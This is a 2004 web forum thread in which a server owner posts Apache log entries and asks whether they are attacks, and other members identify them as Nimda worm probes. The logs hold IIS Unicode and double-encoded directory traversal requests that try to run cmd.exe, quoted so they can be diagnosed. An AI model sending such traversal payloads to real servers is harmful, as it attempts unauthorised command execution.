Forum Moderators: phranque

Message Too Old, No Replies

Hacker?

Some 'strange' loggings in apache log.

         

Marck

7:19 pm on May 20, 2004 (gmt 0)

10+ Year Member



Today I noticed this in the log:

80.***.225.152 - - [18/May/2004:23:05:56 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 294 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:56 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"

Am I mistaken into thinking that these are attempts to get (root) access to my server?

(IP shown is originating ip)

Grtz,

Marck

[edited by: tedster at 8:30 pm (utc) on May 20, 2004]
[edit reason] obscure the IPs [/edit]

jatar_k

7:20 pm on May 20, 2004 (gmt 0)

WebmasterWorld Administrator 10+ Year Member



looks like nimda or some such M$ specific virus

richlowe

7:23 pm on May 20, 2004 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Just a virus (ahem, worm) probe. Get these all the time.

jdMorgan

7:33 pm on May 20, 2004 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Yes, requests for cmd.exe, root.exe, and shell.exe are from a NIMDA-infected machine.

As you can see, these files don't exist on Apache, and some requests are rejected as invalid.

Jim

Marck

7:55 pm on May 20, 2004 (gmt 0)

10+ Year Member



Let me get this straight. An infected machine is trying to infect mine?

And where/how do I see it gets rejected? (My server is running on xp...)

(I just have my server up and running for 2 weeks, so I dont know jack sh-t about all this)

Grtz,

Marck

bufferzone

8:12 pm on May 20, 2004 (gmt 0)

10+ Year Member



Exactly. The nimda worm used the Unicode vulnerability to infect IIS and infected machines scans for other machines to infect.

Your log entries are classic nimda, but could also be mad by a vulnerability scanner. It they are made by a scanner, you will se a lot of other strange stuff in your entry, so rest assured, this is nimda and it cannot infect your apache.

Keep looking through your log files regularly for strange entries and react when you find them. You can always ask in forums lik this, but you would also be able to find out about them by searching in google

Marck

10:27 pm on May 20, 2004 (gmt 0)

10+ Year Member



Ok, thank you all :-)